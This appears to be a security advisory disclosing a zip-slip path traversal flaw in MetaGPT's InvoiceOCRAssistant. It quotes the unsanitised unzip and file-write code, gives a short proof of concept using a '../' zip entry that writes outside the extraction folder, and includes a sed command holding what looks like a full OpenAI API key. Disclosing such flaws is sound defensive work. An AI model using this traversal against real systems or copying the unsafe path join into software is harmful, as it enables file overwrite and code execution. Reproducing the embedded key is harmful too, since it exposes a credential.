Name

Zipslip when parsing invoice zip file via InvoiceOCRAssistant

Weakness

CWE-23: Relative Path Traversal

Severity

High (8.8)

Version

0.8.1

Description

In receipt_assistant, Metagpt supports OCR recognition of invoice files in pdf, png, jpg, and zip formats. And the class InvoiceOCR is responsible for recognizing the invoice files. When the files is compressed with zip format, InvoiceOCR._unzip is used to extract the files in zip file. However, the file name in zip file is not sanitized and appended to dest path directly, could cause zipslip attacks. It’s possible to overwrite files in victims’ mechine, causing code execution attacks.

InvoiceOCR._unzip#L78 function:

@staticmethod
async def _unzip(file_path: Path) -> Path:
    """Unzip a file and return the path to the unzipped directory.

    Args:
        file_path: The path to the zip file.

    Returns:
        The path to the unzipped directory.
    """
    file_directory = file_path.parent / "unzip_invoices" / datetime.now().strftime("%Y%m%d%H%M%S")
    with zipfile.ZipFile(file_path, "r") as zip_ref:
        for zip_info in zip_ref.infolist():
            # Use CP437 to encode the file name, and then use GBK decoding to prevent Chinese garbled code
            relative_name = Path(zip_info.filename.encode("cp437").decode("gbk"))
            if relative_name.suffix:
                # unsafe path appending
                full_filename = file_directory / relative_name
                await File.write(full_filename.parent, relative_name.name, zip_ref.read(zip_info.filename))

    logger.info(f"unzip_path: {file_directory}")
    return file_directory

File.write#L39 function is reponsible for writing the file content in zip file to target path. In Line 39, full_path = root_path / filename, the filename is not santized, filename such as ../../../../../../../../test.txt in zip file will be appended to root_path, causing path traversal and file overwrite.

async def write(cls, root_path: Path, filename: str, content: bytes) -> Path:
    """Write the file content to the local specified path.

    Args:
        root_path: The root path of file, such as "/data".
        filename: The name of file, such as "test.txt".
        content: The binary content of file.

    Returns:
        The full filename of file, such as "/data/test.txt".

    Raises:
        Exception: If an unexpected error occurs during the file writing process.
    """
    root_path.mkdir(parents=True, exist_ok=True)
    full_path = root_path / filename
    async with aiofiles.open(full_path, mode="wb") as writer:
        await writer.write(content)
        logger.debug(f"Successfully write file: {full_path}")
        return full_path

Proof of Concept

Firstly, let’s create a zip file containing relative file name, and save as auth.zip:

zip auth.zip ../../../../../../../home/kali/test.py

Then, install metagpt and it’s ocr extras:

pip install --upgrade metagpt
pip install --upgrade 'metagpt[ocr]'

After installed, we need to init metagpt with our openai key according to official documentation:

# create 
> metagpt --init-config

# fill your openai key, this key is for testing
> sed -i 's/YOUR_API_KEY/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/g' /root/.metagpt/config2.yaml

Before attacks, let’s check the /home/kali/test.py is empty path

> ls -la /home/kali/test.py
ls: cannot access '/home/kali/test.py': No such file or directory

Start attack

Run following snippets from offical tutorial to parse and recognize our auth.zip file:

from metagpt.roles.invoice_ocr_assistant import InvoiceOCRAssistant, InvoicePath
from metagpt.schema import Message

role = InvoiceOCRAssistant()
await role.run(Message(content="Invoicing date", instruct_content=InvoicePath(file_path="auth.zip")))

Now let’s check the file is overwritten successfully:

> ls -la /home/kali/test.py
-rw-r--r-- 1 root root 12 Jun 24 14:50 /home/kali/test.py

Colab

Tested on google colab: https://colab.research.google.com/drive/1ujE5yqxcB_RlRtXMfNSSeTYPLy6DMDwQ?usp=sharing

poc

Impact

This vulnerability can have severe consequences. If victims parse and recognize an malicious zip file, zipslip can be achieved to overwrite files in victims mechine, causing potential code execution attack.

Occurrences

_unzip#L79

write#L39